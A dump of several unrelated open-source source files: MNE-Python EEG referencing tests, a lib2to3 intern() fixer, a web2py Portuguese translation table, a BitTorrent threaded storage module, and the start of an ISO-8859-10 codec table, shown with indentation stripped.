"""Test rereference eeg data"""
raw = Raw(fif_fname, preload=True)
raw.info['projs'] = []
# Test setting an average reference
assert_true(not _has_eeg_average_ref_proj(raw.info['projs']))
reref, ref_data = set_eeg_reference(raw)
assert_true(_has_eeg_average_ref_proj(reref.info['projs']))
assert_true(ref_data is None)
# Test setting an average reference when one was already present
reref, ref_data = set_eeg_reference(raw, copy=False)
assert_true(ref_data is None)
# Rereference raw data by creating a copy of original data
reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'], copy=True)
assert_true(reref.info['custom_ref_applied'])
_test_reference(raw, reref, ref_data, ['EEG 001', 'EEG 002'])
# Test that data is modified in place when copy=False
reref, ref_data = set_eeg_reference(raw, ['EEG 001', 'EEG 002'],
copy=False)
assert_true(raw is reref)
@testing.requires_testing_data
def test_set_bipolar_reference():
"""Test bipolar referencing"""
raw = Raw(fif_fname, preload=True)
reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002', 'bipolar',
{'kind': FIFF.FIFFV_EOG_CH,
'extra': 'some extra value'})
assert_true(reref.info['custom_ref_applied'])
# Compare result to a manual calculation
a = raw.pick_channels(['EEG 001', 'EEG 002'], copy=True)
a = a._data[0, :] - a._data[1, :]
b = reref.pick_channels(['bipolar'], copy=True)._data[0, :]
assert_allclose(a, b)
# Original channels should be replaced by a virtual one
assert_true('EEG 001' not in reref.ch_names)
assert_true('EEG 002' not in reref.ch_names)
assert_true('bipolar' in reref.ch_names)
# Check channel information
bp_info = reref.info['chs'][reref.ch_names.index('bipolar')]
an_info = reref.info['chs'][raw.ch_names.index('EEG 001')]
for key in bp_info:
if key == 'loc' or key == 'eeg_loc':
assert_array_equal(bp_info[key], 0)
elif key == 'coil_type':
assert_equal(bp_info[key], FIFF.FIFFV_COIL_EEG_BIPOLAR)
elif key == 'kind':
assert_equal(bp_info[key], FIFF.FIFFV_EOG_CH)
else:
assert_equal(bp_info[key], an_info[key])
assert_equal(bp_info['extra'], 'some extra value')
# Minimalist call
reref = set_bipolar_reference(raw, 'EEG 001', 'EEG 002')
assert_true('EEG 001-EEG 002' in reref.ch_names)
# Test creating a bipolar reference that doesn't involve EEG channels:
# it should not set the custom_ref_applied flag
reref = set_bipolar_reference(raw, 'MEG 0111', 'MEG 0112',
ch_info={'kind': FIFF.FIFFV_MEG_CH})
assert_true(not reref.info['custom_ref_applied'])
assert_true('MEG 0111-MEG 0112' in reref.ch_names)
# Test a battery of invalid inputs
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', ['EEG 002', 'EEG 003'], 'bipolar')
assert_raises(ValueError, set_bipolar_reference, raw,
['EEG 001', 'EEG 002'], 'EEG 003', 'bipolar')
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', ['bipolar1', 'bipolar2'])
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', 'bipolar',
ch_info=[{'foo': 'bar'}, {'foo': 'bar'}])
assert_raises(ValueError, set_bipolar_reference, raw,
'EEG 001', 'EEG 002', ch_name='EEG 003')
@testing.requires_testing_data
def test_add_reference():
raw = Raw(fif_fname, preload=True)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
# check if channel already exists
assert_raises(ValueError, add_reference_channels,
raw, raw.info['ch_names'][0])
# add reference channel to Raw
raw_ref = add_reference_channels(raw, 'Ref', copy=True)
assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 1)
assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])
orig_nchan = raw.info['nchan']
raw = add_reference_channels(raw, 'Ref', copy=False)
assert_array_equal(raw._data, raw_ref._data)
assert_equal(raw.info['nchan'], orig_nchan + 1)
ref_idx = raw.ch_names.index('Ref')
ref_data, _ = raw[ref_idx]
assert_array_equal(ref_data, 0)
# add two reference channels to Raw
raw = Raw(fif_fname, preload=True)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
assert_raises(ValueError, add_reference_channels, raw,
raw.info['ch_names'][0])
raw_ref = add_reference_channels(raw, ['M1', 'M2'], copy=True)
assert_equal(raw_ref._data.shape[0], raw._data.shape[0] + 2)
assert_array_equal(raw._data[picks_eeg, :], raw_ref._data[picks_eeg, :])
raw = add_reference_channels(raw, ['M1', 'M2'], copy=False)
ref_idx = raw.ch_names.index('M1')
ref_idy = raw.ch_names.index('M2')
ref_data, _ = raw[[ref_idx, ref_idy]]
assert_array_equal(ref_data, 0)
# add reference channel to epochs
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
epochs_ref = add_reference_channels(epochs, 'Ref', copy=True)
assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 1)
ref_idx = epochs_ref.ch_names.index('Ref')
ref_data = epochs_ref.get_data()[:, ref_idx, :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(epochs.info, meg=False, eeg=True)
assert_array_equal(epochs.get_data()[:, picks_eeg, :],
epochs_ref.get_data()[:, picks_eeg, :])
# add two reference channels to epochs
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
epochs_ref = add_reference_channels(epochs, ['M1', 'M2'], copy=True)
assert_equal(epochs_ref._data.shape[1], epochs._data.shape[1] + 2)
ref_idx = epochs_ref.ch_names.index('M1')
ref_idy = epochs_ref.ch_names.index('M2')
ref_data = epochs_ref.get_data()[:, [ref_idx, ref_idy], :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(epochs.info, meg=False, eeg=True)
assert_array_equal(epochs.get_data()[:, picks_eeg, :],
epochs_ref.get_data()[:, picks_eeg, :])
# add reference channel to evoked
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
evoked = epochs.average()
evoked_ref = add_reference_channels(evoked, 'Ref', copy=True)
assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 1)
ref_idx = evoked_ref.ch_names.index('Ref')
ref_data = evoked_ref.data[ref_idx, :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(evoked.info, meg=False, eeg=True)
assert_array_equal(evoked.data[picks_eeg, :],
evoked_ref.data[picks_eeg, :])
# add two reference channels to evoked
raw = Raw(fif_fname, preload=True)
events = read_events(eve_fname)
picks_eeg = pick_types(raw.info, meg=False, eeg=True)
epochs = Epochs(raw, events=events, event_id=1, tmin=-0.2, tmax=0.5,
picks=picks_eeg, preload=True)
evoked = epochs.average()
evoked_ref = add_reference_channels(evoked, ['M1', 'M2'], copy=True)
assert_equal(evoked_ref.data.shape[0], evoked.data.shape[0] + 2)
ref_idx = evoked_ref.ch_names.index('M1')
ref_idy = evoked_ref.ch_names.index('M2')
ref_data = evoked_ref.data[[ref_idx, ref_idy], :]
assert_array_equal(ref_data, 0)
picks_eeg = pick_types(evoked.info, meg=False, eeg=True)
assert_array_equal(evoked.data[picks_eeg, :],
evoked_ref.data[picks_eeg, :])
# Test invalid inputs
raw_np = Raw(fif_fname, preload=False)
assert_raises(RuntimeError, add_reference_channels, raw_np, ['Ref'])
assert_raises(ValueError, add_reference_channels, raw, 1)
| bsd-3-clause |
valkjsaaa/sl4a | python/src/Lib/lib2to3/fixes/fix_intern.py | 49 | 1368 | # Copyright 2006 Georg Brandl.
# Licensed to PSF under a Contributor Agreement.
"""Fixer for intern().
intern(s) -> sys.intern(s)"""
# Local imports
from .. import pytree
from .. import fixer_base
from ..fixer_util import Name, Attr, touch_import
class FixIntern(fixer_base.BaseFix):
PATTERN = """
power< 'intern'
trailer< lpar='('
( not(arglist | argument<any '=' any>) obj=any
| obj=arglist<(not argument<any '=' any>) any ','> )
rpar=')' >
after=any*
>
"""
def transform(self, node, results):
syms = self.syms
obj = results["obj"].clone()
if obj.type == syms.arglist:
newarglist = obj.clone()
else:
newarglist = pytree.Node(syms.arglist, [obj.clone()])
after = results["after"]
if after:
after = [n.clone() for n in after]
new = pytree.Node(syms.power,
Attr(Name("sys"), Name("intern")) +
[pytree.Node(syms.trailer,
[results["lpar"].clone(),
newarglist,
results["rpar"].clone()])] + after)
new.set_prefix(node.get_prefix())
touch_import(None, 'sys', node)
return new
| apache-2.0 |
urrego093/proyecto_mv | applications/welcome/languages/pt-br.py | 88 | 7249 | # -*- coding: utf-8 -*-
{
'!langcode!': 'pt-br',
'!langname!': 'Português (do Brasil)',
'"update" is an optional expression like "field1=\'newvalue\'". You cannot update or delete the results of a JOIN': '"update" é uma expressão opcional como "campo1=\'novovalor\'". Você não pode atualizar ou apagar os resultados de um JOIN',
'%s %%{row} deleted': '%s linhas apagadas',
'%s %%{row} updated': '%s linhas atualizadas',
'%s selected': '%s selecionado',
'%Y-%m-%d': '%d-%m-%Y',
'%Y-%m-%d %H:%M:%S': '%d-%m-%Y %H:%M:%S',
'About': 'Sobre',
'Access Control': 'Controle de Acesso',
'Administrative Interface': 'Interface Administrativa',
'@markmin\x01An error occured, please [[reload %s]] the page': 'Ocorreu um erro, por favor [[reload %s]] a página',
'Administrative interface': 'Interface administrativa',
'Ajax Recipes': 'Receitas de Ajax',
'appadmin is disabled because insecure channel': 'Administração desativada porque o canal não é seguro',
'Are you sure you want to delete this object?': 'Você está certo que deseja apagar este objeto?',
'Available Databases and Tables': 'Bancos de dados e tabelas disponíveis',
'Buy this book': 'Compre o livro',
'cache': 'cache',
'Cache': 'Cache',
'Cache Keys': 'Chaves de cache',
'Cannot be empty': 'Não pode ser vazio',
'change password': 'modificar senha',
'Check to delete': 'Marque para apagar',
'Clear CACHE?': 'Limpar CACHE?',
'Clear DISK': 'Limpar DISCO',
'Clear RAM': 'Limpar memória RAM',
'Client IP': 'IP do cliente',
'Community': 'Comunidade',
'Components and Plugins': 'Componentes e Plugins',
'Controller': 'Controlador',
'Copyright': 'Copyright',
'Current request': 'Requisição atual',
'Current response': 'Resposta atual',
'Current session': 'Sessão atual',
'customize me!': 'Personalize-me!',
'data uploaded': 'dados enviados',
'Database': 'banco de dados',
'Database %s select': 'Selecionar banco de dados %s',
'db': 'bd',
'DB Model': 'Modelo BD',
'Delete:': 'Apagar:',
'Demo': 'Demo',
'Deployment Recipes': 'Receitas de deploy',
'Description': 'Descrição',
'design': 'projeto',
'DISK': 'DISK',
'Disk Cache Keys': 'Chaves do Cache de Disco',
'Disk Cleared': 'Disco Limpo',
'Documentation': 'Documentação',
"Don't know what to do?": "Não sabe o que fazer?",
'done!': 'concluído!',
'Download': 'Download',
'E-mail': 'E-mail',
'Edit': 'Editar',
'Edit current record': 'Editar o registro atual',
'edit profile': 'editar perfil',
'Edit This App': 'Editar esta aplicação',
'Email and SMS': 'Email e SMS',
'Errors': 'Erros',
'Enter an integer between %(min)g and %(max)g': 'Informe um valor inteiro entre %(min)g e %(max)g',
'export as csv file': 'exportar como um arquivo csv',
'FAQ': 'Perguntas frequentes',
'First name': 'Nome',
'Forms and Validators': 'Formulários e Validadores',
'Free Applications': 'Aplicações gratuitas',
'Group ID': 'ID do Grupo',
'Groups': 'Grupos',
'Hello World': 'Olá Mundo',
'Home': 'Principal',
'How did you get here?': 'Como você chegou aqui?',
'import': 'importar',
'Import/Export': 'Importar/Exportar',
'Index': 'Início',
'insert new': 'inserir novo',
'insert new %s': 'inserir novo %s',
'Internal State': 'Estado Interno',
'Introduction': 'Introdução',
'Invalid email': 'Email inválido',
'Invalid Query': 'Consulta Inválida',
'invalid request': 'requisição inválida',
'Key': 'Chave',
'Last name': 'Sobrenome',
'Layout': 'Layout',
'Layout Plugins': 'Plugins de Layout',
'Layouts': 'Layouts',
'Live chat': 'Chat ao vivo',
'Live Chat': 'Chat ao vivo',
'login': 'Entrar',
'Login': 'Autentique-se',
'logout': 'Sair',
'Lost Password': 'Esqueceu sua senha?',
'lost password?': 'esqueceu sua senha?',
'Main Menu': 'Menu Principal',
'Manage Cache': 'Gerenciar Cache',
'Menu Model': 'Modelo de Menu',
'My Sites': 'Meus sites',
'Name': 'Nome',
'New Record': 'Novo Registro',
'new record inserted': 'novo registro inserido',
'next 100 rows': 'próximas 100 linhas',
'No databases in this application': 'Não há bancos de dados nesta aplicação',
'Object or table name': 'Nome do objeto do da tabela',
'Online examples': 'Exemplos online',
'or import from csv file': 'ou importar de um arquivo csv',
'Origin': 'Origem',
'Other Plugins': 'Outros Plugins',
'Other Recipes': 'Outras Receitas',
'Overview': 'Visão Geral',
'Password': 'Senha',
'Plugins': 'Plugins',
'Powered by': 'Desenvolvido com',
'Preface': 'Prefácio',
'previous 100 rows': '100 linhas anteriores',
'Python': 'Python',
'Query:': 'Consulta:',
'Quick Examples': 'Exemplos rápidos',
'RAM': 'RAM',
'RAM Cache Keys': 'RAM Cache Keys',
'Ram Cleared': 'Ram Cleared',
'Recipes': 'Receitas',
'Record': 'Registro',
'record does not exist': 'registro não existe',
'Record ID': 'ID do Registro',
'Record id': 'id do registro',
'Register': 'Registre-se',
'register': 'Registre-se',
'Registration key': 'Chave de registro',
'Reset Password key': 'Resetar chave de senha',
'Resources': 'Recursos',
'Role': 'Papel',
'Registration identifier': 'Idenficador de registro',
'Rows in Table': 'Linhas na tabela',
'Rows selected': 'Linhas selecionadas',
'Semantic': 'Semântico',
'Services': 'Serviço',
'Size of cache:': 'Tamanho do cache:',
'state': 'estado',
'Statistics': 'Estatísticas',
'Stylesheet': 'Folha de estilo',
'submit': 'enviar',
'Support': 'Suporte',
'Sure you want to delete this object?': 'Está certo(a) que deseja apagar este objeto?',
'Table': 'Tabela',
'Table name': 'Nome da tabela',
'The "query" is a condition like "db.table1.field1==\'value\'". Something like "db.table1.field1==db.table2.field2" results in a SQL JOIN.': 'Uma "consulta" é uma condição como "db.tabela1.campo1==\'valor\'". Expressões como "db.tabela1.campo1==db.tabela2.campo2" resultam em um JOIN SQL.',
'The Core': 'The Core',
'The output of the file is a dictionary that was rendered by the view %s': 'A saída do arquivo é um dicionário que foi apresentado pela visão %s',
'The Views': 'As views',
'This App': 'Esta aplicação',
'This email already has an account': 'Este email já tem uma conta',
'This is a copy of the scaffolding application': 'Isto é uma cópia da aplicação modelo',
'Time in Cache (h:m:s)': 'Tempo em Cache (h:m:s)',
'Timestamp': 'Timestamp',
'Twitter': 'Twitter',
'unable to parse csv file': 'não foi possível analisar arquivo csv',
'Update:': 'Atualizar:',
'Use (...)&(...) for AND, (...)|(...) for OR, and ~(...) for NOT to build more complex queries.': 'Use (...)&(...) para AND, (...)|(...) para OR, e ~(...) para NOT para construir consultas mais complexas.',
'User ID': 'ID do Usuário',
'User Voice': 'Opinião dos usuários',
'Videos': 'Vídeos',
'View': 'Visualização',
'Web2py': 'Web2py',
'Welcome': 'Bem-vindo',
'Welcome %s': 'Bem-vindo %s',
'Welcome to web2py': 'Bem-vindo ao web2py',
'Welcome to web2py!': 'Bem-vindo ao web2py!',
'Which called the function %s located in the file %s': 'Que chamou a função %s localizada no arquivo %s',
'You are successfully running web2py': 'Você está executando o web2py com sucesso',
'You are successfully running web2py.': 'Você está executando o web2py com sucesso.',
'You can modify this application and adapt it to your needs': 'Você pode modificar esta aplicação e adaptá-la às suas necessidades',
'You visited the url %s': 'Você acessou a url %s',
'Working...': 'Trabalhando...',
}
| gpl-3.0 |
rabimba/p2pScrapper | BitTorrent-5.2.2/BitTorrent/Storage_threadpool.py | 6 | 14110 | # The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Bram Cohen and Greg Hazel
import os
import sys
import Queue
from bisect import bisect_right
from BTL.translation import _
from BTL.obsoletepythonsupport import set
from BitTorrent import BTFailure
from BTL.defer import Deferred, ThreadedDeferred, Failure, wrap_task
from BTL.yielddefer import launch_coroutine
from BitTorrent.platform import get_allocated_regions
from BTL.sparse_set import SparseSet
from BTL.DictWithLists import DictWithLists, DictWithSets
import BTL.stackthreading as threading
from BitTorrent.Storage_base import open_sparse_file, make_file_sparse
from BitTorrent.Storage_base import bad_libc_workaround, is_open_for_write
from BitTorrent.Storage_base import UnregisteredFileException
class FilePool(object):
def __init__(self, doneflag, add_task, external_add_task,
max_files_open, num_disk_threads):
self.doneflag = doneflag
self.external_add_task = external_add_task
self.file_to_torrent = {}
self.free_handle_condition = threading.Condition()
self.active_file_to_handles = DictWithSets()
self.open_file_to_handles = DictWithLists()
self.set_max_files_open(max_files_open)
self.diskq = Queue.Queue()
for i in xrange(num_disk_threads):
t = threading.Thread(target=self._disk_thread,
name="disk_thread-%s" % (i+1))
t.start()
self.doneflag.addCallback(self.finalize)
def finalize(self, r=None):
# re-queue self so all threads die. we end up with one extra event on
# the queue, but who cares.
self._create_op(self.finalize)
def close_all(self):
failures = {}
self.free_handle_condition.acquire()
while self.get_open_file_count() > 0:
while len(self.open_file_to_handles) > 0:
filename, handle = self.open_file_to_handles.popitem()
try:
handle.close()
except Exception, e:
failures[self.file_to_torrent[filename]] = e
self.free_handle_condition.notify()
if self.get_open_file_count() > 0:
self.free_handle_condition.wait(1)
self.free_handle_condition.release()
for torrent, e in failures.iteritems():
torrent.got_exception(e)
def close_files(self, file_set):
failures = set()
self.free_handle_condition.acquire()
done = False
while not done:
filenames = list(self.open_file_to_handles.iterkeys())
for filename in filenames:
if filename not in file_set:
continue
handles = self.open_file_to_handles.poprow(filename)
for handle in handles:
try:
handle.close()
except Exception, e:
failures.add(e)
self.free_handle_condition.notify()
done = True
for filename in file_set.iterkeys():
if filename in self.active_file_to_handles:
done = False
break
if not done:
self.free_handle_condition.wait(0.5)
self.free_handle_condition.release()
if len(failures) > 0:
raise failures.pop()
def set_max_files_open(self, max_files_open):
if max_files_open <= 0:
max_files_open = 1e100
self.max_files_open = max_files_open
self.close_all()
def add_files(self, files, torrent):
for filename in files:
if filename in self.file_to_torrent:
raise BTFailure(_("File %s belongs to another running torrent")
% filename)
for filename in files:
self.file_to_torrent[filename] = torrent
def remove_files(self, files):
for filename in files:
del self.file_to_torrent[filename]
def _ensure_exists(self, filename, length=0):
if not os.path.exists(filename):
f = os.path.split(filename)[0]
if f != '' and not os.path.exists(f):
os.makedirs(f)
f = file(filename, 'wb')
make_file_sparse(filename, f, length)
f.close()
def get_open_file_count(self):
t = self.open_file_to_handles.total_length()
t += self.active_file_to_handles.total_length()
return t
def acquire_handle(self, filename, for_write, length=0):
# this will block until a new file handle can be made
self.free_handle_condition.acquire()
if filename not in self.file_to_torrent:
self.free_handle_condition.release()
raise UnregisteredFileException()
while self.active_file_to_handles.total_length() == self.max_files_open:
self.free_handle_condition.wait()
if filename in self.open_file_to_handles:
handle = self.open_file_to_handles.pop_from_row(filename)
if for_write and not is_open_for_write(handle.mode):
handle.close()
handle = open_sparse_file(filename, 'rb+', length=length)
#elif not for_write and is_open_for_write(handle.mode):
# handle.close()
# handle = open_sparse_file(filename, 'rb', length=length)
else:
if self.get_open_file_count() == self.max_files_open:
oldfname, oldhandle = self.open_file_to_handles.popitem()
oldhandle.close()
self._ensure_exists(filename, length)
if for_write:
handle = open_sparse_file(filename, 'rb+', length=length)
else:
handle = open_sparse_file(filename, 'rb', length=length)
self.active_file_to_handles.push_to_row(filename, handle)
self.free_handle_condition.release()
return handle
def release_handle(self, filename, handle):
self.free_handle_condition.acquire()
self.active_file_to_handles.remove_fom_row(filename, handle)
self.open_file_to_handles.push_to_row(filename, handle)
self.free_handle_condition.notify()
self.free_handle_condition.release()
def _create_op(self, _f, *args, **kwargs):
df = Deferred()
self.diskq.put((df, _f, args, kwargs))
return df
read = _create_op
write = _create_op
def _disk_thread(self):
while not self.doneflag.isSet():
df, func, args, kwargs = self.diskq.get(True)
try:
v = func(*args, **kwargs)
except:
self.external_add_task(0, df.errback, Failure())
else:
self.external_add_task(0, df.callback, v)
class Storage(object):
def __init__(self, config, filepool, save_path,
files, add_task,
external_add_task, doneflag):
self.filepool = filepool
self.config = config
self.doneflag = doneflag
self.add_task = add_task
self.external_add_task = external_add_task
self.initialize(save_path, files)
def initialize(self, save_path, files):
# a list of bytes ranges and filenames for window-based IO
self.ranges = []
# a dict of filename-to-ranges for piece priorities and filename lookup
self.range_by_name = {}
# a sparse set for smart allocation detection
self.allocated_regions = SparseSet()
# dict of filename-to-length on disk (for % complete in the file view)
self.undownloaded = {}
self.save_path = save_path
# Rather implement this as an ugly hack here than change all the
# individual calls. Affects all torrent instances using this module.
if self.config['bad_libc_workaround']:
bad_libc_workaround()
self.initialized = False
self.startup_df = ThreadedDeferred(wrap_task(self.external_add_task),
self._build_file_structs,
self.filepool, files)
return self.startup_df
def _build_file_structs(self, filepool, files):
total = 0
for filename, length in files:
# we're shutting down, abort.
if self.doneflag.isSet():
return False
self.undownloaded[filename] = length
if length > 0:
self.ranges.append((total, total + length, filename))
self.range_by_name[filename] = (total, total + length)
if os.path.exists(filename):
if not os.path.isfile(filename):
raise BTFailure(_("File %s already exists, but is not a "
"regular file") % filename)
l = os.path.getsize(filename)
if l > length:
# This is the truncation Bram was talking about that no one
# else thinks is a good idea.
#h = file(filename, 'rb+')
#make_file_sparse(filename, h, length)
#h.truncate(length)
#h.close()
l = length
a = get_allocated_regions(filename, begin=0, length=l)
if a is not None:
a.offset(total)
else:
a = SparseSet()
if l > 0:
a.add(total, total + l)
self.allocated_regions += a
total += length
self.total_length = total
self.initialized = True
return True
def get_byte_range_for_filename(self, filename):
if filename not in self.range_by_name:
filename = os.path.normpath(filename)
filename = os.path.join(self.save_path, filename)
return self.range_by_name[filename]
def was_preallocated(self, pos, length):
return self.allocated_regions.is_range_in(pos, pos+length)
def get_total_length(self):
return self.total_length
def _intervals(self, pos, amount):
r = []
stop = pos + amount
p = max(bisect_right(self.ranges, (pos, 2 ** 500)) - 1, 0)
for begin, end, filename in self.ranges[p:]:
if begin >= stop:
break
r.append((filename, max(pos, begin) - begin, min(end, stop) - begin))
return r
def _read(self, filename, pos, amount):
begin, end = self.get_byte_range_for_filename(filename)
length = end - begin
h = self.filepool.acquire_handle(filename, for_write=False, length=length)
if h is None:
return
try:
h.seek(pos)
r = h.read(amount)
finally:
self.filepool.release_handle(filename, h)
return r
def _batch_read(self, pos, amount):
dfs = []
r = []
# queue all the reads
for filename, pos, end in self._intervals(pos, amount):
df = self.filepool.read(self._read, filename, pos, end - pos)
dfs.append(df)
# yield on all the reads in order - they complete in any order
exc = None
for df in dfs:
yield df
try:
r.append(df.getResult())
except:
exc = exc or sys.exc_info()
if exc:
raise exc[0], exc[1], exc[2]
r = ''.join(r)
if len(r) != amount:
raise BTFailure(_("Short read (%d of %d) - something truncated files?") %
(len(r), amount))
yield r
def read(self, pos, amount):
df = launch_coroutine(wrap_task(self.add_task),
self._batch_read, pos, amount)
return df
def _write(self, filename, pos, s):
begin, end = self.get_byte_range_for_filename(filename)
length = end - begin
h = self.filepool.acquire_handle(filename, for_write=True, length=length)
if h is None:
return
try:
h.seek(pos)
h.write(s)
finally:
self.filepool.release_handle(filename, h)
return len(s)
def _batch_write(self, pos, s):
dfs = []
total = 0
amount = len(s)
# queue all the writes
for filename, begin, end in self._intervals(pos, amount):
length = end - begin
d = buffer(s, total, length)
total += length
df = self.filepool.write(self._write, filename, begin, d)
dfs.append(df)
# yield on all the writes - they complete in any order
exc = None
for df in dfs:
yield df
try:
df.getResult()
except:
exc = exc or sys.exc_info()
if exc:
raise exc[0], exc[1], exc[2]
yield total
def write(self, pos, s):
df = launch_coroutine(wrap_task(self.add_task),
self._batch_write, pos, s)
return df
def close(self):
if not self.initialized:
self.startup_df.addCallback(lambda *a : self.filepool.close_files(self.range_by_name))
return self.startup_df
self.filepool.close_files(self.range_by_name)
def downloaded(self, pos, length):
for filename, begin, end in self._intervals(pos, length):
self.undownloaded[filename] -= end - begin
| mit |
jcoady9/python-for-android | python3-alpha/python3-src/Lib/encodings/iso8859_10.py | 272 | 13589 | """ Python Character Mapping Codec iso8859_10 generated from 'MAPPINGS/ISO8859/8859-10.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_table)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_table)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='iso8859-10',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Table
decoding_table = (
'\x00' # 0x00 -> NULL
'\x01' # 0x01 -> START OF HEADING
'\x02' # 0x02 -> START OF TEXT
'\x03' # 0x03 -> END OF TEXT
'\x04' # 0x04 -> END OF TRANSMISSION
'\x05' # 0x05 -> ENQUIRY
'\x06' # 0x06 -> ACKNOWLEDGE
'\x07' # 0x07 -> BELL
'\x08' # 0x08 -> BACKSPACE
'\t' # 0x09 -> HORIZONTAL TABULATION
'\n' # 0x0A -> LINE FEED
'\x0b' # 0x0B -> VERTICAL TABULATION
'\x0c' # 0x0C -> FORM FEED
'\r' # 0x0D -> CARRIAGE RETURN
'\x0e' # 0x0E -> SHIFT OUT
'\x0f' # 0x0F -> SHIFT IN
'\x10' # 0x10 -> DATA LINK ESCAPE
'\x11' # 0x11 -> DEVICE CONTROL ONE
'\x12' # 0x12 -> DEVICE CONTROL TWO
'\x13' # 0x13 -> DEVICE CONTROL THREE
'\x14' # 0x14 -> DEVICE CONTROL FOUR
'\x15' # 0x15 -> NEGATIVE ACKNOWLEDGE
'\x16' # 0x16 -> SYNCHRONOUS IDLE
'\x17' # 0x17 -> END OF TRANSMISSION BLOCK
'\x18' # 0x18 -> CANCEL
'\x19' # 0x19 -> END OF MEDIUM
'\x1a' # 0x1A -> SUBSTITUTE
'\x1b' # 0x1B -> ESCAPE
'\x1c' # 0x1C -> FILE SEPARATOR
'\x1d' # 0x1D -> GROUP SEPARATOR
'\x1e' # 0x1E -> RECORD SEPARATOR
'\x1f' # 0x1F -> UNIT SEPARATOR
' ' # 0x20 -> SPACE
'!' # 0x21 -> EXCLAMATION MARK
'"' # 0x22 -> QUOTATION MARK
'#' # 0x23 -> NUMBER SIGN
'$' # 0x24 -> DOLLAR SIGN
'%' # 0x25 -> PERCENT SIGN
'&' # 0x26 -> AMPERSAND
"'" # 0x27 -> APOSTROPHE
'(' # 0x28 -> LEFT PARENTHESIS
')' # 0x29 -> RIGHT PARENTHESIS
'*' # 0x2A -> ASTERISK
'+' # 0x2B -> PLUS SIGN
',' # 0x2C -> COMMA
'-' # 0x2D -> HYPHEN-MINUS
'.' # 0x2E -> FULL STOP
'/' # 0x2F -> SOLIDUS
'0' # 0x30 -> DIGIT ZERO
'1' # 0x31 -> DIGIT ONE
'2' # 0x32 -> DIGIT TWO
'3' # 0x33 -> DIGIT THREE
'4' # 0x34 -> DIGIT FOUR
'5' # 0x35 -> DIGIT FIVE
'6' # 0x36 -> DIGIT SIX
'7' # 0x37 -> DIGIT SEVEN
'8' # 0x38 -> DIGIT EIGHT
'9' # 0x39 -> DIGIT NINE
':' # 0x3A -> COLON
';' # 0x3B -> SEMICOLON
'<' # 0x3C -> LESS-THAN SIGN
'=' # 0x3D -> EQUALS SIGN
'>' # 0x3E -> GREATER-THAN SIGN
'?' # 0x3F -> QUESTION MARK
'@' # 0x40 -> COMMERCIAL AT
'A' # 0x41 -> LATIN CAPITAL LETTER A
'B' # 0x42 -> LATIN CAPITAL LETTER B
'C' # 0x43 -> LATIN CAPITAL LETTER C
'D' # 0x44 -> LATIN CAPITAL LETTER D
'E' # 0x45 -> LATIN CAPITAL LETTER E
'F' # 0x46 -> LATIN CAPITAL LETTER F
'G' # 0x47 -> LATIN CAPITAL LETTER G
'H' # 0x48 -> LATIN CAPITAL LETTER H
'I' # 0x49 -> LATIN CAPITAL LETTER I
'J' # 0x4A -> LATIN CAPITAL LETTER J
'K' # 0x4B -> LATIN CAPITAL LETTER K
'L' # 0x4C -> LATIN CAPITAL LETTER L
'M' # 0x4D -> LATIN CAPITAL LETTER M
'N' # 0x4E -> LATIN CAPITAL LETTER N
'O' # 0x4F -> LATIN CAPITAL LETTER O
'P' # 0x50 -> LATIN CAPITAL LETTER P
'Q' # 0x51 -> LATIN CAPITAL LETTER Q
'R' # 0x52 -> LATIN CAPITAL LETTER R
'S' # 0x53 -> LATIN CAPITAL LETTER S
'T' # 0x54 -> LATIN CAPITAL LETTER T
'U' # 0x55 -> LATIN CAPITAL LETTER U
'V' # 0x56 -> LATIN CAPITAL LETTER V
'W' # 0x57 -> LATIN CAPITAL LETTER W
'X' # 0x58 -> LATIN CAPITAL LETTER X
'Y' # 0x59 -> LATIN CAPITAL LETTER Y
'Z' # 0x5A -> LATIN CAPITAL LETTER Z
'[' # 0x5B -> LEFT SQUARE BRACKET
'\\' # 0x5C -> REVERSE SOLIDUS
']' # 0x5D -> RIGHT SQUARE BRACKET
